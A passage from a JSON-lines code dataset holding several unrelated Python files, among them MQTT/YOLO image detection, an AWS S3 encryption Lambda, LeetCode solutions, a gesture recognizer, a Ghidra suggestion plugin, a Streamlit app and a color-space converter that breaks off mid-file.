4.9], np.float32)\n\n vad = transx.vad_samples(logger, chunk_gen(), chunk_size, max_size, start, blanks)\n first_start, first = vad.__next__()\n assert first_start == 1\n assert first.all() == np.array([-12.3, 4.9, -12.3, 4.9, -12.3, 4.9, -12.3, 4.9, -12.3, 4.9, -12.3, 4.9, -12.3, 4.9, -12.3, 4.9, -12.3, 4.9, -12.3, 4.9], np.float32).all()\n\ndef test_vad_samples_silences(mocker: MockerFixture):\n sample = 0\n def pretend_vad(self, x, return_seconds=False):\n nonlocal sample\n assert x.shape == (1024,)\n assert x.dtype == np.float32\n sample += len(x)\n self.current_sample = sample\n return None\n\n mocker.patch('libs.vad.utils_vad.VADIterator.reset_states')\n mocker.patch('libs.vad.utils_vad.VADIterator.__call__', pretend_vad)\n\n chunk_size = 1024\n start = 0\n blanks = mp.Queue()\n def chunk_gen():\n for x in range(1, 72):\n yield np.zeros(1024, np.float32)\n \n vad = transx.vad_samples(logger, chunk_gen(), chunk_size, 320000, start, blanks)\n\n with pytest.raises(StopIteration):\n vad.__next__()\n \n assert blanks.qsize() == 4\n assert blanks.get() == (0.0, 1.024, None)\n assert blanks.get() == (1.088, 2.112, None)\n assert blanks.get() == (2.176, 3.2, None)\n assert blanks.get() == (3.264, 4.288, None)","repo_name":"karsaroth/smatter","sub_path":"tests/test_transx.py","file_name":"test_transx.py","file_ext":"py","file_size_in_byte":11128,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"92"} +{"seq_id":"21073231138","text":"#\n# MQTT Image processing class\n# Used for analysing and annotating an image with detection boxes.\n# Author: Joakim Eriksson, joakim.eriksson@ri.se\n#\n\nimport paho.mqtt.client as mqtt\nimport cv2, sys, numpy as np\nimport images_pb2\n\n# Hack to allow import of the yolov3 detector\n# should be in a package later...\nsys.path.append('../yolov3-ha')\nimport yolo3\n\ndef create_image_pb(frame, id):\n img = images_pb2.Image()\n h, w = frame.shape[:2]\n img.width = w\n img.height = h\n img.id = id\n img.imgdata = cv2.imencode('.png', frame)[1].tostring()\n return img\n\ndef create_detections_pb(detections, image_pb):\n if detections == []:\n return None\n det_pb = images_pb2.ImageObjectDetections()\n det_pb.image.CopyFrom(image_pb)\n det_pb.algorithm_name = \"Yolo V3 / COCO\"\n for detection in detections:\n tmpdet = det_pb.detections.add()\n tmpdet.class_name = detection[0]\n tmpdet.score = detection[1]\n tmpdet.left = detection[2][0]\n tmpdet.top = detection[2][1]\n tmpdet.right = detection[2][2]\n tmpdet.bottom = detection[2][3]\n return det_pb;\n\nclass MQTTImageProcess(mqtt.Client):\n\n def __init__(self, id):\n super().__init__(id)\n self.frame = None\n self.show_frame = False\n\n def on_connect(self, mqttc, obj, flags, rc):\n if rc == 0:\n print(\"Connected to broker:\", rc)\n else:\n print(\"Connection failed: \", rc)\n\n def on_message(self, mqttc, obj, message):\n print(message.topic + \" \" + str(message.qos))\n if message.topic == \"ha/camera/mqtt\":\n print(\"Matched!!!\")\n nparr = np.frombuffer(message.payload, np.uint8)\n self.frame = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n self.show_frame = True\n elif message.topic == \"ha/camera/mqtt_pb\":\n frame_pb = images_pb2.Image()\n frame_pb.ParseFromString(message.payload)\n print(\"PB img: width:\",frame_pb.width, \"height:\", frame_pb.height)\n nparr = np.frombuffer(frame_pb.imgdata, np.uint8)\n self.frame = cv2.imdecode(nparr, cv2.IMREAD_COLOR)\n self.show_frame = True\n\n def on_publish(self, mqttc, obj, mid):\n print(\"mid: \"+str(mid))\n\n def on_subscribe(self, mqttc, obj, mid, granted_qos):\n print(\"Subscribed: \" + str(mid) + \" \" + str(granted_qos) + \" \" + str(obj))\n\n def on_log(self, mqttc, obj, level, string):\n print(string)\n\n\n\n# If you want to use a specific client id, use\n# mqttc = MyMQTTClass(\"client-id\")\n# but note that the client id must be unique on the broker. Leaving the client\n# id parameter empty will generate a random id for you.\nclient = MQTTImageProcess(\"test-id\")\nclient.connect(\"localhost\")\n# Should take this a configs...\nclient.subscribe(\"ha/camera/mqtt\", 0)\nclient.subscribe(\"ha/camera/mqtt_pb\", 0)\nclient.loop_start()\n\nyolo = yolo3.YoloV3(0.5, 0.4, datapath=\"../yolov3-ha\")\n\nwhile(True):\n # Capture frame-by-frame\n if client.show_frame:\n# cv2.imshow('Cam-frame', frame)\n nf = client.frame.copy()\n d = yolo.detect(nf)\n if d != []:\n # Create a detections protocol buffer \n img = create_image_pb(nf, \"the-id\")\n det_pb = create_detections_pb(d, img)\n cv2.imshow('Det-frame', nf)\n client.show_frame = False\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# When everything done, release the capture\ncv2.destroyAllWindows()","repo_name":"joakimeriksson/ai-smarthome","sub_path":"mqtt-camera/mqtt-img.py","file_name":"mqtt-img.py","file_ext":"py","file_size_in_byte":3476,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"92"} +{"seq_id":"5256475062","text":"#==================================================================================================\n# Function: \n# Purpose: A Python function to list the AWS S3 buckets in the account that do not have\n# encryption status and apply the default encryption\n#==================================================================================================\n\nimport boto3, json, datetime, os, sys\nfrom time import gmtime, strftime\nfrom datetime import date\n\n#==================================================================================================\n# Function handler\n#==================================================================================================\ndef lambda_handler(event, context):\n \n buckets = {}\n buckets['Encryption_Applied'] = []\n #buckets['Already_Encrypted'] = []\n \n date_fmt = strftime(\"%d_%m_%Y_%H:%M:%S\", gmtime()) #get to the current date\n account_id = context.invoked_function_arn.split(\":\")[4]\n sns_topic_arn = os.environ['TOPIC_ARN']\n sns_topic_region = os.environ['TOPIC_REGION']\n s3_bucket_exception_list = os.environ['S3_EXCEPTION']\n \n\n s3client = boto3.client('s3')\n\n print(boto3.__version__)\n \n try:\n # describe buckets\n list_bucket_response = s3client.list_buckets()\n for bucket_dictionary in list_bucket_response['Buckets']:\n if bucket_dictionary['Name'] not in s3_bucket_exception_list:\n try:\n bucket_encryption_response = s3client.get_bucket_encryption(Bucket=bucket_dictionary['Name'])\n for rules in bucket_encryption_response['ServerSideEncryptionConfiguration']['Rules']:\n for key, value in rules['ApplyServerSideEncryptionByDefault'].items():\n if (str(value) in ('AES256','aws:kms')):\n print (\"\\n{0} is already encrypted\".format(bucket_dictionary['Name']))\n #buckets['Already_Encrypted'].append(bucket_dictionary['Name'])\n except:\n print (\"\\n{0} unencrypted\".format(bucket_dictionary['Name']))\n response = s3client.put_bucket_encryption(\n Bucket=bucket_dictionary['Name'],\n ServerSideEncryptionConfiguration={\n 'Rules': [{\n 'ApplyServerSideEncryptionByDefault': {'SSEAlgorithm': 'AES256'}\n }, ]\n })\n print (\"Default Encryption applied\")\n buckets['Encryption_Applied'].append(bucket_dictionary['Name'])\n\n if (buckets['Encryption_Applied'] == []):\n print (\"Nothing to SNS\")\n else:\n # SNS topic Section\n sns_client = boto3.client('sns',region_name=sns_topic_region)\n subject = 'AWS Account - ' + account_id + ' S3 Bucket Encryption Status ' + date_fmt\n message_body = '\\n' + \"Encryption applied to S3 buckets are \" + str(buckets)\n sns_client.publish(TopicArn=sns_topic_arn, Message=message_body, Subject=subject)\n \n return buckets\n\n except:\n err = 'Error'\n for e in sys.exc_info():\n err += str(e)\n print(\"error {0}\".format(err))\n","repo_name":"ministryofjustice/cloud-platform-terraform-awsaccounts-baselines","sub_path":"modules/lambdas/functions/s3-bucket-enable-default-encryption/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"3454855554","text":"class Solution:\r\n def minWindow(self, s: str, t: str) -> str:\r\n if s == None or t == None or len(s) == 0 or len(t) == 0 or len(s)= 0.99:\n # print(str(value)+\" \"+str(result))\n\n #cv2.putText(clone, 'Gesture Recognize as : '+str(classname), (10, 25), cv2.FONT_HERSHEY_SIMPLEX,0.5, (0, 255, 255), 2)\n #if oldresult != result:\n #play(playcount,result)\n #oldresult = result\n #playcount = playcount + 1\n \n \n cv2.rectangle(clone, (left, top), (right, bottom), (0,255,0), 2)\n num_frames += 1\n cv2.imshow(\"Video Feed\", clone)\n keypress = cv2.waitKey(1) & 0xFF\n if keypress == ord(\"q\"):\n break\n camera.release()\n cv2.destroyAllWindows() \n \nfont = ('times', 16, 'bold')\ntitle = Label(main, text='Robust Hand Gesture Recognition using Multiple-Shape Oriented Visual Cues',anchor=W, justify=CENTER)\ntitle.config(bg='yellow4', fg='white') \ntitle.config(font=font) \ntitle.config(height=3, width=120) \ntitle.place(x=0,y=5)\n\n\nfont1 = ('times', 13, 'bold')\nupload = Button(main, text=\"Upload Hand Gesture Dataset\", command=uploadDataset)\nupload.place(x=50,y=100)\nupload.config(font=font1) \n\npathlabel = Label(main)\npathlabel.config(bg='yellow4', fg='white') \npathlabel.config(font=font1) \npathlabel.place(x=50,y=150)\n\nmarkovButton = Button(main, text=\"Train SVM with Gesture Images\", command=trainSVM)\nmarkovButton.place(x=50,y=200)\nmarkovButton.config(font=font1)\n\npredictButton = Button(main, text=\"Hand Gesture Recognition from Webcam\", command=webcamPredict)\npredictButton.place(x=50,y=250)\npredictButton.config(font=font1)\n\n\nfont1 = ('times', 12, 'bold')\ntext=Text(main,height=15,width=78)\nscroll=Scrollbar(text)\ntext.configure(yscrollcommand=scroll.set)\ntext.place(x=450,y=100)\ntext.config(font=font1)\n\ndeleteDirectory()\nmain.config(bg='yellow')\nmain.mainloop()\n","repo_name":"coderkrishna/Hand-gesture-recognition","sub_path":"HandGestureRecognize.py","file_name":"HandGestureRecognize.py","file_ext":"py","file_size_in_byte":13792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"12343616314","text":"import asyncio\nimport logging\nimport re\n\nfrom typing import Any, Optional\n\nfrom qtoggleserver.core import ports as core_ports\nfrom qtoggleserver.core.typing import NullablePortValue, PortValue\nfrom qtoggleserver.lib import polled\n\nfrom .exceptions import CommandTimeout\nfrom .. import cmdline\n\n\nclass CommandLine(polled.PolledPeripheral):\n DEFAULT_POLL_INTERVAL = 10\n RETRY_POLL_INTERVAL = 5\n DEFAULT_TIMEOUT = 5\n\n logger = logging.getLogger(cmdline.__name__)\n\n def __init__(\n self,\n *,\n output_regexp: Optional[str] = None,\n read_command: Optional[str] = None,\n write_command: Optional[str] = None,\n ports: list[dict[str, Any]] = None,\n port: dict[str, Any] = None,\n timeout: int = DEFAULT_TIMEOUT,\n **kwargs\n ) -> None:\n\n super().__init__(**kwargs)\n\n self._output_regexp: Optional[re.Pattern] = None\n self._read_command: Optional[str] = read_command\n self._write_command: Optional[str] = write_command\n self._port_details: list[dict[str, Any]] = ports\n self._timeout: int = timeout\n\n if port and not ports:\n self._port_details = [port]\n\n if output_regexp:\n self._output_regexp = re.compile(output_regexp, re.MULTILINE | re.DOTALL)\n\n self._values: dict[str, Optional[float]] = {p['id']: None for p in self._port_details}\n\n async def run_command(self, cmd: str, env: Optional[dict[str, str]]) -> tuple[str, int]:\n self.debug('executing command \"%s\"', cmd)\n\n p = await asyncio.create_subprocess_shell(\n cmd,\n stdout=asyncio.subprocess.PIPE,\n stderr=asyncio.subprocess.PIPE,\n env=env\n )\n\n try:\n stdout, stderr = await asyncio.wait_for(p.communicate(), timeout=self._timeout)\n except asyncio.TimeoutError:\n raise CommandTimeout()\n\n if stderr:\n stderr = stderr.decode().strip()\n stderr = stderr.replace('\\n', '\\\\n')\n self.warning('command returned stderr: %s', stderr)\n\n stdout = stdout.decode().strip()\n\n return stdout, p.returncode\n\n async def poll(self) -> None:\n if not self._read_command:\n return\n\n output, exit_code = await self.run_command(self._read_command, env=None)\n\n if self._output_regexp:\n m = self._output_regexp.match(output)\n if not m:\n # If output doesn't match our regexp, use None for all values\n for k in self._values:\n self._values[k] = None\n\n return\n\n groups = list(m.groups())\n if not groups:\n groups = [output] * len(self._port_details)\n\n while len(groups) < len(self._port_details):\n groups.append('')\n\n for i, p in enumerate(self._port_details):\n g = groups[i].strip().lower()\n try:\n value = int(g)\n except ValueError:\n try:\n value = float(g)\n except ValueError:\n value = None\n\n if (p['type'] == core_ports.TYPE_BOOLEAN) and (value is None):\n value = int(g == 'true') # for boolean ports, text \"true\" is also accepted\n\n self._values[p['id']] = value\n else:\n # When no regexp is given, use exit code\n for i, k in enumerate(self._values):\n if self._port_details[i]['type'] == core_ports.TYPE_BOOLEAN:\n self._values[k] = int(not exit_code) # process exit code 0 means true\n else:\n self._values[k] = exit_code\n\n def get_value(self, port_id: str) -> NullablePortValue:\n return self._values.get(port_id)\n\n def update_value(self, port_id: str, value: PortValue) -> None:\n if isinstance(value, bool):\n value = int(value) # keep only int/float values\n\n self._values[port_id] = value\n\n async def write_values(self) -> None:\n env = {}\n for port_id, value in self._values.items():\n if value is None:\n value = ''\n else:\n value = str(value)\n\n port_id = re.sub('[^a-zA-Z0-9_-]', '_', port_id)\n env[port_id] = value\n\n _, exit_code = await self.run_command(self._write_command, env=env)\n\n if exit_code:\n self.warning('command returned non-zero exit code %d', exit_code)\n\n # Poll values immediately after writing\n await self.poll()\n\n async def make_port_args(self) -> list[dict[str, Any]]:\n from .ports import CommandLinePort\n\n return [{\n 'driver': CommandLinePort,\n 'id': p['id'],\n 'type': p['type'],\n 'writable': self._write_command is not None\n } for p in self._port_details]\n","repo_name":"qtoggle/qtoggleserver-cmdline","sub_path":"qtoggleserver/cmdline/peripheral.py","file_name":"peripheral.py","file_ext":"py","file_size_in_byte":4936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"38504035708","text":"#TODO write a description for this script\n#@author \n#@category Python 3\n#@keybinding Ctrl-Shift-K\n#@menupath \n#@toolbar \n\n\n#TODO Add User Code Here\nfrom ghidra.util.task import TaskMonitor\nfrom ghidra.app.decompiler import DecompInterface\nfrom ghidra.app.decompiler import DecompileOptions\nfrom ghidra.program.model.symbol import SourceType\nfrom ghidra.util.task import ConsoleTaskMonitor\nimport json\nfrom java.security import MessageDigest\nfrom ghidra.program.model.listing import Program\nimport requests\n\n\ndef send_code_to_server(sha256, function_offset, code, suggestion):\n \"\"\"\n Send the decompiled code to a server for analysis.\n \n Args:\n sha256 (str): The SHA-256 hash value of the program.\n function_offset (str): The offset value of the function.\n code (str): The decompiled code of the function.\n \n Returns:\n dict: A dictionary containing the server's response.\n \"\"\"\n #url = \"http://localhost:8000/suggest\" # Adjust the URL if needed\n url = \"http://lupine.richards.ai:9001/suggest\" # Adjust the URL if needed\n\n\n\n print(sha256, function_offset, code, suggestion)\n data = {\n \"sha256\": sha256,\n \"offset\": function_offset,\n \"code\": code,\n \"suggestion\": suggestion\n }\n headers = {\n \"Content-Type\": \"application/json\"\n }\n\n response = requests.post(url, data=json.dumps(data), headers=headers)\n print(response)\n \n if response.status_code != 200:\n raise Exception(f\"Server returned status code {response.status_code}: {response.text}\")\n \n return response.json()\n\n\n\noptions = DecompileOptions()\nmonitor = ConsoleTaskMonitor()\nifc = DecompInterface()\nifc.setOptions(options)\n\nstate = getState()\nlocation_str = state.getCurrentLocation().getAddress().toString()\nlocation = state.getCurrentLocation().getAddress()\n\nprint(\"Starting script\")\ntask_monitor = TaskMonitor.DUMMY\nprint(\"Task monitor created\")\ndecompiler = DecompInterface()\nprint(\"Decompiler created\")\ndecompiler.openProgram(currentProgram())\nprint(\"Program opened at: {location}\".format(location=location))\n\n\nhash_value = currentProgram().getExecutableSHA256()\nfm = currentProgram().getFunctionManager()\n#first we try to get the function at the current location\n\nfunction = fm.getFunctionAt(location)\nprint(\"Function found at location: {location}\".format(location=location))\n#check to see if Fucntion is None\nif function is None:\n print(\"Function is None, looking for a function with that address\")\n function = fm.getFunctionContaining(location)\n #check to see if Fucntion is None\n if function is None:\n print(\"Function is None for this address\")\n\n \n\n#hash_value = program.getExecutableImage().getBytes()\n\n#print(\"SHA-256 Hash: {hash_value}\".format(hash_value=hash_value))\n#print(\"location_str: {location_str}\".format(location_str=location_str))\n#print(\"function: {function}\".format(function=function))\n\nc_code = decompiler.decompileFunction(function, 90, task_monitor).getDecompiledFunction().getC()\n#print(c_code)\ncomment = function.getComment()\n#print(\"repeatable comment: {comment}\".format(comment=comment))\n\nresponse = send_code_to_server(hash_value, location_str, c_code, comment)\nprint(\"Server Response:\", response)\n","repo_name":"binaryninja/decode-ai","sub_path":"plugins/llm_suggest.py","file_name":"llm_suggest.py","file_ext":"py","file_size_in_byte":3234,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"92"} +{"seq_id":"24097850906","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Oct 21 15:59:35 2019\r\n\r\n@author: liuga\r\n\"\"\"\r\n#相对153 有重复数字 [4,5,6,7,0,1,4] [2,2,2,0,1] nums拆分成2个排序数组\r\n#最坏的情况下,比如数组所有元素都相同,时间复杂度降低到o(n)\r\nclass Solution(object):\r\n def findMin(self, nums):\r\n l, r = 0 , len(nums)-1\r\n while l < r :\r\n m = (l + r)//2\r\n if nums[m] > nums[r]: #mid在第一个排序数组中 i 满徐 mid = nums[0]:\r\n l = mid\r\n else:\r\n r = mid -1\r\n return nums[r+1] if r + 1 < n else nums[0]\r\n","repo_name":"Misskesite/Leetcode","sub_path":"154findMiniRotatedArray.py","file_name":"154findMiniRotatedArray.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"10339181560","text":"#\n# @lc app=leetcode.cn id=117 lang=python3\n#\n# [117] 填充每个节点的下一个右侧节点指针 II\n#\n\n# class Node:\n# def __init__(self, val: int = 0, left: 'Node' = None, right: 'Node' = None, next: 'Node' = None):\n# self.val = val\n# self.left = left\n# self.right = right\n# self.next = next\n\n\n# @lc code=start\n\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, val: int = 0, left: 'Node' = None, right: 'Node' = None, next: 'Node' = None):\n self.val = val\n self.left = left\n self.right = right\n self.next = next\n\"\"\"\n\n\nclass Solution:\n def connect(self, root: 'Node') -> 'Node':\n if not root:\n return root\n head = root\n while head: # 当前层的头节点\n cur = head # 当前层处理节点\n pre = head = None # 初始化下一层头节点和前置节点\n while cur:\n if cur.left:\n if not pre: # 若尚未找到下一层前置节点,则同步更新下一层头节点和前置节点\n pre = head = cur.left\n else: # 已找到下一层前置节点,则将前置节点指向当前子节点,并前移pre\n pre.next = cur.left\n pre = pre.next\n if cur.right:\n if not pre:\n pre = head = cur.right\n else:\n pre.next = cur.right\n pre = pre.next\n cur = cur.next\n return root\n# @lc code=end\n\n\n# root = Node(1)\n# root.left = Node(2)\n# root.right = Node(3)\n# root.left.left = Node(4)\n# root.left.right = Node(5)\n# root.right.right = Node(7)\n\n# solution = Solution()\n# resRoot = solution.connect(root)\n\n\n# def read(root):\n# que = [root]\n# while que:\n# cur = que.pop(0)\n# print(cur.val, cur.next)\n# if cur.left:\n# que.append(cur.left)\n# if cur.right:\n# que.append(cur.right)\n\n\n# read(resRoot)\n","repo_name":"jeiizou/leetcode-note","sub_path":"117.填充每个节点的下一个右侧节点指针-ii.py","file_name":"117.填充每个节点的下一个右侧节点指针-ii.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"43657532236","text":"import streamlit as st\nimport pandas as pd\nimport pickle\nimport xgboost as xgb\n\n# Title\nst.header(\"Prediksi Indeks Pendidikan di Jawa Barat\")\n\n\ncol1, col2, col3, col4 = st.columns([1,0.75,1.5,1.5])\n\n# Dropdown input\nwith col1:\n status_kegiatan_buta_aksara= st.slider(\"Kegiatan Pemberantasan Buta Aksara (%)\", 0,100,25)\n ketersediaan_pkbm = st.number_input(\"Jumlah Ketersediaan Pusat Kegiatan Belajar\",step=1,min_value=0)\n ketersediaan_tbm = st.number_input(\"Jumlah Perpustakaan\",step=1,min_value=0)\n jumlah_angkatan_kerja = st.number_input(\"Jumlah Angkatan Kerja \",step=1,min_value=0)\n kepadatan_penduduk = st.number_input(\"Total Kepadatan Penduduk\",step=1,min_value=0)\n\nwith col2:\n Jumlah_SD = st.number_input(\"Jumlah SMD\",step=1,min_value=0)\n Jumlah_SMP = st.number_input(\"Jumlah SMP\",step=1,min_value=0)\n Jumlah_SMA = st.number_input(\"Jumlah SMA\",step=1,min_value=0)\n Jumlah_SMK= st.number_input(\"Jumlah SMK\",step=1,min_value=0)\n\nwith col3:\n Jumlah_Guru_SD = st.number_input(\"Jumlah Guru SD\",step=1,min_value=0)\n Jumlah_Guru_SMP = st.number_input(\"Jumlah Guru SMP\",step=1,min_value=0)\n Jumlah_Guru_SMA = st.number_input(\"Jumlah Guru SMA\",step=1,min_value=0)\n Jumlah_Guru_SMK = st.number_input(\"Jumlah Guru SMK\",step=1,min_value=0)\n\nwith col4:\n waktu_tempuh_sd_terdekat = st.number_input(\"Waktu Tempuh SD Terdekat(dalam menit)\",step=0.1,min_value=0.0)\n waktu_tempuh_smp_terdekat = st.number_input(\"Waktu Tempuh SMP Terdekat(dalam menit)\",step=0.1,min_value=0.0)\n waktu_tempuh_sma_terdekat = st.number_input(\"Waktu Tempuh SMA Terdekat(dalam menit)\",step=0.1,min_value=0.0)\n Garis_Kemiskinan = st.number_input(\"Garis Kemiskinan Menurut Kab/Kota (Rupiah/Perkapita/Perbulan)\",step=1,min_value=0)\n\n\n# If button is pressed\nif st.button(\"Prediksi Indeks Pendidikan Berdasarkan data Anda\"):\n \n # Unpickle model\n xgb_cv_model= pickle.load(open(\"xgb_cv.pkl\", 'rb'))\n scaler_fitur= pickle.load(open(\"scaler_fitur.pkl\", 'rb'))\n scaler_target= pickle.load(open(\"scaler_target.pkl\", 'rb'))\n\n # Store inputs into dataframe\n df_input = pd.DataFrame([[status_kegiatan_buta_aksara, ketersediaan_pkbm, ketersediaan_tbm,jumlah_angkatan_kerja,kepadatan_penduduk,Jumlah_SD,Jumlah_SMP,Jumlah_SMA,Jumlah_SMK,\n Jumlah_Guru_SD,Jumlah_Guru_SMP,Jumlah_Guru_SMA,Jumlah_Guru_SMK,waktu_tempuh_sd_terdekat,waktu_tempuh_smp_terdekat,waktu_tempuh_sma_terdekat,Garis_Kemiskinan]], \n columns = ['status_kegiatan_buta_aksara', 'ketersediaan_pkbm','ketersediaan_tbm', 'jumlah_angkatan_kerja',\n 'kepadatan_penduduk','Jumlah SD', 'Jumlah SMP', 'Jumlah SMA', 'Jumlah SMK', 'Jumlah Guru SD', 'Jumlah Guru SMP', 'Jumlah Guru SMA', 'Jumlah Guru SMK',\n 'waktu_tempuh_sd_terdekat', 'waktu_tempuh_smp_terdekat', 'waktu_tempuh_sma_terdekat', 'Garis Kemiskinan Menurut Kab/Kota (Rupiah/Perkapita/Perbulan)']\n )\n\n def feature_engineering_features (df_selected):\n\n df_selected_feature=df_selected\n\n features= ['status_kegiatan_buta_aksara',\n 'ketersediaan_pkbm',\n 'ketersediaan_tbm',\n 'jumlah_angkatan_kerja',\n 'kepadatan_penduduk',\n 'Jumlah SD',\n 'Jumlah SMP',\n 'Jumlah SMA',\n 'Jumlah SMK',\n 'Jumlah Guru SD',\n 'Jumlah Guru SMP',\n 'Jumlah Guru SMA',\n 'Jumlah Guru SMK',\n 'waktu_tempuh_sd_terdekat',\n 'waktu_tempuh_smp_terdekat',\n 'waktu_tempuh_sma_terdekat',\n 'Garis Kemiskinan Menurut Kab/Kota (Rupiah/Perkapita/Perbulan)']\n\n df_selected_feature = df_selected_feature.transpose().reindex(features).transpose().astype(float)\n\n df_selected_feature['status_kegiatan_buta_aksara']= df_selected_feature['status_kegiatan_buta_aksara']/100\n \n # inputdata = pd.DataFrame(scaler_fitur.transform(df_selected_feature[features]),columns = features)\n\n return df_selected_feature\n\n Data_input = feature_engineering_features(df_input)\n\n #st.text(Data_input.transpose())\n # Get prediction\n #Prediction:\n result_prediction= xgb_cv_model.predict(Data_input)\n data_hasil =pd.DataFrame(result_prediction,columns= ['indeks_pendidikan'])\n inversed_result = scaler_target.inverse_transform(data_hasil)\n\n # Output prediction\n st.text(print(\"Hasil prediksi nilai indeks pendidikan berdasarkan kondisi anda\", inversed_result))","repo_name":"FirRW/PrediksiIndeksPendidikan","sub_path":"Deployment/Input and Model/Predindeks.py","file_name":"Predindeks.py","file_ext":"py","file_size_in_byte":4615,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"7471628195","text":"import json\nimport logging\nimport os\n\nfrom ics.environment import ICS_CONF\nfrom ics.environment import ICS_CONF_FILE\nfrom ics.resource import get_resource\nfrom ics.resource import grp_add\nfrom ics.resource import res_add\nfrom ics.resource import res_link\n\nlogger = logging.getLogger(__name__)\n\n\ndef read_json(filename):\n \"\"\"Read data from configuration file and return data\"\"\"\n try:\n with open(filename, 'r') as file:\n return json.load(file)\n except IOError as error:\n logger.error('Unable to load config file {}, {}'.format(filename, str(error)))\n raise\n\n\ndef write_json(filename, data):\n \"\"\"Write configuration data in json to file\"\"\"\n try:\n with open(filename, 'w') as file:\n json.dump(data, file, indent=4, sort_keys=True)\n except IOError as error:\n logger.error('Unable to save config file {}, {}'.format(filename, str(error)))\n raise\n\n\ndef load_config():\n \"\"\"Read ICS configuration from file\"\"\"\n logger.info('Loading from config file')\n if not os.path.isfile(ICS_CONF_FILE):\n logger.info('No config file found, skipping load')\n return\n\n data_dict = read_json(ICS_CONF_FILE)\n\n for group_name in data_dict.keys():\n grp_add(group_name)\n for resource_name in data_dict[group_name]:\n res_add(resource_name, group_name)\n resource = get_resource(resource_name)\n for attr_name in data_dict[group_name][resource_name]['attributes'].keys():\n resource.attr[attr_name] = str(data_dict[group_name][resource_name]['attributes'][attr_name])\n\n # Links need to done in separate loop to guarantee parent\n # resources are created when establishing a link\n for group_name in data_dict.keys():\n for resource_name in data_dict[group_name]:\n for parent_name in data_dict[group_name][resource_name]['dependencies']:\n res_link(parent_name, resource_name)\n\n logger.debug('Resource configuration loaded from file {}'.format(ICS_CONF_FILE))\n\n\ndef write_config(data):\n \"\"\"Save ICS configuration to file\"\"\"\n #data_dict = {}\n #default_attr = resource_attributes['resource']\n\n #for group in groups.values():\n # group_name = group.name\n # data_dict[group_name] = {}\n # for resource in group.members:\n # resource_name = resource.name\n # data_dict[group_name][resource_name] = {}\n # data_dict[group_name][resource_name]['attributes'] = {}\n # for attr_name in resource.attr.keys():\n # attr_value = resource.attr[attr_name]\n # if attr_value != default_attr[attr_name]['default']:\n # data_dict[group_name][resource_name]['attributes'][attr_name] = attr_value\n # data_dict[group.name][resource_name]['dependencies'] = []\n # for parent in resource.parents:\n # data_dict[group_name][resource_name]['dependencies'].append(parent.name)\n\n if not os.path.isdir(ICS_CONF):\n try:\n os.makedirs(ICS_CONF)\n except OSError as e:\n logger.error('Unable to create config directory: {}'.format(ICS_CONF))\n logger.error('Reason: {}'.format(e))\n\n write_json(ICS_CONF_FILE, data)\n","repo_name":"Raleigh24/icsserver","sub_path":"ics/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3254,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"74106544940","text":"import numpy as np\nimport math\nimport cv2\nfrom PIL import Image\n\nclass ImageProcessor:\n def __init__(self):\n pass\n\n def process(self, filename):\n image = cv2.imread(filename) \n\n self.num_pixels = image.shape[0] * image.shape[1]\n return image\n\n def histogram(self, image, bins=256):\n num_channels = image.shape[2]\n hist = np.zeros((bins, num_channels)) \n\n for row in range(len(image)):\n for col in range(len(image[row])):\n\n r = image[row][col][0]\n g = image[row][col][1]\n b = image[row][col][2]\n\n hist[r][0] += 1\n hist[g][1] += 1\n hist[b][2] += 1\n\n return hist\n\n def normalize_histogram(self, histogram): \n colors = histogram.shape[1]\n normalized = np.zeros((1, colors)) \n \n for col in range(colors):\n normalized[0][col] = ((255 / self.num_pixels) \n * np.sum(histogram[:,col]))\n \n return normalized \n\n # Turn the RGB image to Hue, \n def RGB_to_HSL(self, image):\n # I should probably change this to only three color channels\n hsl = np.zeros(image.shape, 'float64')\n print(f'HSL shape: {hsl.shape}')\n for row in range(len(image)):\n for col in range(len(image[row])):\n # color channels\n R = image[row][col][0] / 255\n G = image[row][col][1] / 255\n B = image[row][col][2] / 255\n #print(f'RGB: {R},{G},{B}') \n\n MIN = min(R, G, B)\n MAX = max(R, G, B)\n L = (MAX + MIN) / 2\n\n if (MAX - MIN) == 0:\n S = 0\n else:\n S = (MAX - MIN) / (1 - abs(2*L - 1))\n \n # Getting the Hue\n if MAX == MIN:\n H = 0 \n elif MAX == R and G >= B:\n H = 60 * ((G - B) / (MAX - MIN))\n elif MAX == R and G < B:\n H = 60 * ((G - B) / (MAX - MIN)) + 360\n elif MAX == G:\n H = 60 * ((B - R) / (MAX - MIN)) + 120 \n elif MAX == B:\n H = 60 * ((R - G) / (MAX - MIN)) + 240\n \n #print(f'HSL: {H}, {S}, {L}')\n hsl[row][col] = np.array([H, S, L])\n\n return hsl \n\n def HSL_to_RGB(self, image):\n rgb = np.zeros((600, 800, 3), 'uint8')\n for row in range(len(image)):\n for col in range(len(image[row])):\n H = image[row][col][0]\n S = image[row][col][1]\n L = image[row][col][2]\n\n C = (1 - abs(2 * L - 1) * S)\n X = C * (1 - abs((H / 60) % 2 - 1))\n m = L - (C / 2)\n\n Rp, Gp, Bp = 0, 0, 0\n\n if H >=0 and H < 60:\n Rp, Gp, Bp = C, X, 0\n elif H >=0 and H < 120:\n Rp, Gp, Bp = X, C, 0\n elif H >=120 and H < 180:\n Rp, Gp, Bp = 0, C, X\n elif H >= 180 and H < 240:\n Rp, Gp, 